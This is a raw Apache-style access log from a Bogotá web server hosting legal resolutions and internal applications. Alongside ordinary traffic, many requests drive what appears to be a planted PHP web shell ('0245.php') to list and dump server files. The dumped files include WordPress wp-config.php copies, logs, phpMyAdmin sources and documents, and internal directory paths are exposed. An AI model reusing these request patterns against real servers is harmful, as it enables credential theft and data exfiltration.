181.53.14.143 - - [11/Jul/2024:00:37:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 22292
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:24 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.20.142 - - [11/Jul/2024:00:37:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5C&f=phpinfo.php&white=1 HTTP/1.1" 200 121
66.249.66.19 - - [11/Jul/2024:00:37:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5148.pdf HTTP/1.1" 200 455014
47.128.121.106 - - [11/Jul/2024:00:37:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=wp-list-revisions.min.js&ft=img&white=1 HTTP/1.1" 200 571
181.53.14.143 - - [11/Jul/2024:00:37:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:35 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:31 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 181296
181.53.14.143 - - [11/Jul/2024:00:37:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 22292
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:40 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.56.0 - - [11/Jul/2024:00:37:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion%5CSolicitudes+relacionadas+con+calidad+del+aire+auditiva+y+visual%5CEvaluaci%F3n+conceptos+favorabilidad+realizaci%F3n+Eventos%5C&f=Aplicativo.html&white=1 HTTP/1.1" 200 276
181.53.14.143 - - [11/Jul/2024:00:37:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:37:46 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 183115
201.245.192.253 - - [11/Jul/2024:00:37:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.123 - - [11/Jul/2024:00:37:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=60SegundosJul23.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 18718422
47.128.121.117 - - [11/Jul/2024:00:37:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4067.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 700396
66.249.66.20 - - [11/Jul/2024:00:38:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/1766.pdf HTTP/1.1" 304 -
47.128.37.175 - - [11/Jul/2024:00:33:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_Veterinaria.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 -
201.245.192.253 - - [11/Jul/2024:00:38:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.135 - - [11/Jul/2024:00:39:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=tbl_triggers.php&ft=html&white=1 HTTP/1.1" 200 143
47.128.28.239 - - [11/Jul/2024:00:39:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2529.tif&ft=info&fullhexdump=1 HTTP/1.1" 200 473225
66.249.66.20 - - [11/Jul/2024:00:39:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3671.pdf HTTP/1.1" 200 145984
47.128.58.126 - - [11/Jul/2024:00:39:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=ssi.shtml&ft=html&white=1 HTTP/1.1" 200 86
47.128.110.168 - - [11/Jul/2024:00:39:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion-22%5C&f=residuos.php&ft=html&white=1 HTTP/1.1" 200 1245
47.128.110.168 - - [11/Jul/2024:00:39:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/bootstrap.min.css HTTP/1.1" 404 1424
47.128.110.168 - - [11/Jul/2024:00:39:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/jquery.min.js HTTP/1.1" 404 1424
47.128.58.131 - - [11/Jul/2024:00:39:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2057.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 631694
47.128.16.128 - - [11/Jul/2024:00:39:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3807.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 605902
40.77.167.28 - - [11/Jul/2024:00:39:58 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12732
201.245.192.253 - - [11/Jul/2024:00:39:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.49.236 - - [11/Jul/2024:00:40:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=heartbeat.min.js&ft=html&white=1 HTTP/1.1" 200 1932
47.128.49.234 - - [11/Jul/2024:00:40:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1906.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 706028
201.245.192.253 - - [11/Jul/2024:00:40:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 32413
201.245.192.253 - - [11/Jul/2024:00:40:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36603
201.245.192.253 - - [11/Jul/2024:00:40:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29021
47.128.58.175 - - [11/Jul/2024:00:40:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=mercuryd.dll&ft=info&fullhexdump=1 HTTP/1.1" 200 204324
201.245.192.253 - - [11/Jul/2024:00:40:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [11/Jul/2024:00:40:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [11/Jul/2024:00:41:10 -0500] "HEAD / HTTP/1.1" 200 -
47.128.124.46 - - [11/Jul/2024:00:41:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=ms-edit.php&ft=html&white=1 HTTP/1.1" 200 191
47.128.46.149 - - [11/Jul/2024:00:41:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Clavanderias%5C&f=lavanderias.html&white=1 HTTP/1.1" 200 923
201.245.192.253 - - [11/Jul/2024:00:41:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29021
47.128.57.10 - - [11/Jul/2024:00:41:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=updates.min.js&ft=code&white=1 HTTP/1.1" 200 2441
172.22.2.4 - - [11/Jul/2024:00:40:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Jul/2024:00:41:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [11/Jul/2024:00:42:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20601-650/00000638.tif HTTP/1.1" 200 122368
47.128.20.168 - - [11/Jul/2024:00:42:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5C&f=sqlnet.log&ft=info&fullhexdump=1 HTTP/1.1" 200 536399
47.128.44.98 - - [11/Jul/2024:00:42:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=comment.min.js&ft=html&white=1 HTTP/1.1" 200 482
47.128.28.69 - - [11/Jul/2024:00:38:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=Escombros.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 32470
47.128.33.92 - - [11/Jul/2024:00:42:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0700.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 605656
47.128.60.10 - - [11/Jul/2024:00:42:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono%5C&f=plantilla4.html&ft=code&white=1 HTTP/1.1" 200 1618
47.128.47.157 - - [11/Jul/2024:00:42:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=admin-post.php&ft=html&white=1 HTTP/1.1" 200 649
172.22.2.4 - - [11/Jul/2024:00:41:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
201.245.192.253 - - [11/Jul/2024:00:42:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.119.219 - - [11/Jul/2024:00:42:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2207.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 777698
172.22.2.4 - - [11/Jul/2024:00:42:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
66.249.66.21 - - [11/Jul/2024:00:43:53 -0500] "GET /BLA/resoluciones/AUTOS%202023/4030.pdf HTTP/1.1" 304 -
201.245.192.253 - - [11/Jul/2024:00:43:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [11/Jul/2024:00:44:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.69.66 - - [11/Jul/2024:00:45:20 -0500] "GET /dia-internacional-de-la-tierra-actividades-para-estar-en-armonia-y-conexion-con-la-naturaleza.html HTTP/1.1" 200 927
47.128.37.250 - - [11/Jul/2024:00:45:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=heartbeat.js&ft=code&white=1 HTTP/1.1" 200 7416
201.245.192.253 - - [11/Jul/2024:00:45:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
47.128.119.76 - - [11/Jul/2024:00:45:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=moderation.php&ft=html&white=1 HTTP/1.1" 200 207
66.249.66.21 - - [11/Jul/2024:00:45:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5380.pdf HTTP/1.1" 304 -
66.249.66.21 - - [11/Jul/2024:00:45:54 -0500] "GET /Publicaciones/2024EE74774.pdf HTTP/1.1" 404 227
66.249.66.21 - - [11/Jul/2024:00:45:55 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2027%20de%20Junio%20de%202018.pdf HTTP/1.1" 304 -
201.245.192.253 - - [11/Jul/2024:00:45:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.115 - - [11/Jul/2024:00:46:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=ms-sites.php&ft=html&white=1 HTTP/1.1" 200 185
66.249.66.20 - - [11/Jul/2024:00:46:04 -0500] "GET /BLA/resoluciones/AUTOS%202013/2134.pdf HTTP/1.1" 200 260732
216.245.221.92 - - [11/Jul/2024:00:46:10 -0500] "HEAD / HTTP/1.1" 200 -
47.128.59.60 - - [11/Jul/2024:00:46:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Caccesibilidad%5C&f=tips.html&ft=code&white=1 HTTP/1.1" 200 2159
47.128.57.224 - - [11/Jul/2024:00:46:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=url.php&ft=html&white=1 HTTP/1.1" 200 631
47.128.121.83 - - [11/Jul/2024:00:46:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Header.class.php&ft=html&white=1 HTTP/1.1" 200 5235
47.128.121.83 - - [11/Jul/2024:00:46:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/'%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.%20$basedir%20.%20'phpmyadmin.css.php'%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.%20$common_url%20.%20'&nocache='%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.%20$theme_id%20.%20$GLOBALS['text_dir']%20.%20' HTTP/1.1" 404 1424
47.128.121.83 - - [11/Jul/2024:00:46:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/'%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.%20$theme_path%20.%20'/jquery/jquery-ui-1.9.2.custom.css HTTP/1.1" 404 1424
47.128.121.83 - - [11/Jul/2024:00:46:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/'%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.%20$basedir%20.%20'print.css HTTP/1.1" 404 1424
47.128.120.92 - - [11/Jul/2024:00:45:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=60Sgs_Ene28.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 16409574
47.128.43.120 - - [11/Jul/2024:00:46:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1818.tif&ft=info&fullhexdump=1 HTTP/1.1" 200 1290421
47.128.97.195 - - [11/Jul/2024:00:46:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=AlejaComadreja.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 1120453
201.245.192.253 - - [11/Jul/2024:00:46:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.18.57 - - [11/Jul/2024:00:47:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=install.php&ft=code&white=1 HTTP/1.1" 200 5316
47.128.19.206 - - [11/Jul/2024:00:47:11 -0500] "GET /robots.txt HTTP/1.1" 404 1018
139.180.136.106 - - [11/Jul/2024:00:47:24 -0500] "GET /robots.txt HTTP/1.1" 404 1018
47.128.116.141 - - [11/Jul/2024:00:47:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2447.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 684374
47.128.119.139 - - [11/Jul/2024:00:47:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5C&f=wp-config.php&ft=html&white=1 HTTP/1.1" 200 1741
66.249.66.19 - - [11/Jul/2024:00:47:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2186.pdf HTTP/1.1" 200 309452
172.22.2.4 - - [11/Jul/2024:00:46:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.63.73 - - [11/Jul/2024:00:47:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1244.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 744398
52.167.144.226 - - [11/Jul/2024:00:47:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6749.pdf HTTP/1.1" 200 2352106
201.245.192.253 - - [11/Jul/2024:00:47:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.63.29 - - [11/Jul/2024:00:48:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5C&f=wp-configmall.php&ft=html&white=1 HTTP/1.1" 200 1702
47.128.28.166 - - [11/Jul/2024:00:48:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=media-audiovideo.js&ft=html&white=1 HTTP/1.1" 200 5149
66.249.66.19 - - [11/Jul/2024:00:48:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8152.pdf HTTP/1.1" 200 497543
47.128.41.96 - - [11/Jul/2024:00:48:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5C&f=wp-config.php&ft=html&white=1 HTTP/1.1" 200 1674
186.102.111.36 - - [11/Jul/2024:00:48:39 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18hNb4VbtocbBnvGInKwnFjHwAYRL+k9PV3wm1FqeCJQrnG8yadmEziKQrVretWlNCgxl0UlRpp+XKFvjwn2b1qRu96LnyKIruKjLgp2F7wq57TMTlTuN0hppVL0Ow86Z8iGAwBmu1zA1a0P4zlZVbHDySG6Cc7Gc4UfUY+X/RcCgqJdGSot161mBmgo1ppdwOjzyPHPmm7Iwi6thcMTK7jHXb6HwomZMP+88mJ15vqGaHupameHx2LJB3Fh/Xrv99pzO9CLCqqrg==&u=U2FsdGVkX191pZTIJX/lZGYA4NkER1q6EiuZdZbMg2LvExFni3SrtLvWL1AbW0BX&y=U2FsdGVkX1+79hPjTeycKAHu4P6N3GmUiAhNbxPT7jDIvaa5fUpNYfOWTd4TxpwV HTTP/1.1" 200 26
186.102.111.36 - - [11/Jul/2024:00:48:40 -0500] "GET /kwssiamovil/sm/acme/a?s=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